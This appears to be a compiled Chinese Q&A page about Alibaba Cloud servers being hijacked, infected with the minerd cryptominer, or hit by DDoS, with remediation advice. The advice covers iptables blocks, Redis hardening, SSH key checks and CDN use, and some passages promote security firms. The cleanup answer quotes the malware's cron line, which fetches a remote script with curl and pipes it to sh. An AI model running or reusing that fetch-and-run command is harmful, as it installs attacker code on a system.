阿里雲挖礦進程肉雞

㈠ 阿里雲伺服器剛買兩天就被攻擊當肉雞，黑客怎麼做到的

您這伺服器是被黑客入侵了，被黑的因素 一般都是程序留了後門或vps內被留了系統內核級別的木馬 或網站的代碼留了隱蔽性的木馬或一句話shell
一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
伺服器被黑是每個網站管理員最頭痛的問題 也可以通過安全公司來解決，國內也就Sinesafe和綠盟等安全公司 比較專業.

㈡ 阿里雲伺服器剛買兩天就被攻擊當肉雞，黑客怎麼做到的

因為你伺服器裡面開放的埠弱口令或者伺服器有漏洞、你恰好IP被掃機的掃到了。別人也不是針對你只是你運氣好。

㈢ 阿里雲伺服器剛買兩天就被攻擊當肉雞，黑客怎麼做到的

網站程序或伺服器有漏洞，請關閉不必要的埠，及時打補丁。另外就是檢查網站程序的漏洞了。

㈣ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

㈤ 阿里雲伺服器被攻擊怎麼辦

分布式拒絕服務攻擊(DDOS)是目前常見的網路攻擊方法，它的英文全稱為Distributed Denial of Service?簡單來說，很多DoS攻擊源一起攻擊某台伺服器就形成了DDOS攻擊，從而成倍地提高拒絕服務攻擊的威力。

通常，攻擊者將攻擊程序通過代理程序安裝在網路上的各個「肉雞」上，代理程序收到指令時就發動攻擊。

隨著DDOS攻擊的成本越來越低，很多人就通過DDOS來實現對某個網站或某篇文章的「下線」功能，某篇文章可能因為內容質量好，在搜索引擎有較高的排名，但如果因為DDOS導致網站長時間無法訪問，搜索引擎則會將這篇文章從索引中刪除，網站的權重也會降低，因為達到了「下線」文章的目的。

對付DDOS不太容易，首先要找一個靠譜的主機供應商，我之前有個主機供應商，一發現某個IP被DDOS，就主動屏蔽這個IP好幾天，實際上就是硬體和技術能力不足的表現。

國外的主機供應商也未必靠譜，比如之前有次被DDOS，我就把博客轉到Dreamhost的空間，事實表明Dreamhost的防DDOS的能力不敢恭維，DDOS來了之後，Dreamhost對付DDOS倒是不客氣，直接把中國地區的IP全給屏蔽了。

一般來說，DDOS是需要花錢和帶寬的，解決DDOS也需要花錢和帶寬，那麼，如果伺服器被DDOS了，我們應該怎麼辦呢?

1、保證伺服器系統的安全

首先要確保伺服器軟體沒有任何漏洞，防止攻擊者入侵。確保伺服器採用最新系統，並打上安全補丁。在伺服器上刪除未使用的服務，關閉未使用的埠。對於伺服器上運行的網站，確保其打了最新的補丁，沒有安全漏洞。

2、隱藏伺服器的真實IP地址

不要把域名直接解析到伺服器的真實IP地址，不能讓伺服器真實IP泄漏，伺服器前端加CDN中轉(免費的CDN一般能防止5G左右的DDOS)，如果資金充裕的話，可以購買高防的盾機，用於隱藏伺服器真實IP，域名解析使用CDN的IP，所有解析的子域名都使用CDN的IP地址。此外，伺服器上部署的其他域名也不能使用真實IP解析，全部都使用CDN來解析。

總之，只要伺服器的真實IP不泄露，5G以下小流量DDOS的預防花不了多少錢，免費的CDN就可以應付得了。如果攻擊流量超過10G，那麼免費的CDN可能就頂不住了，需要購買一些高防的收費CDN，一般高防CDN比較貴，比如阿里雲騰訊雲的10G防護一個月就78千一年，目前國內性價比比較高的推薦：網路雲加速 ,10GDDOS防護套餐只需要1190一年，代理商買更便宜。相關鏈接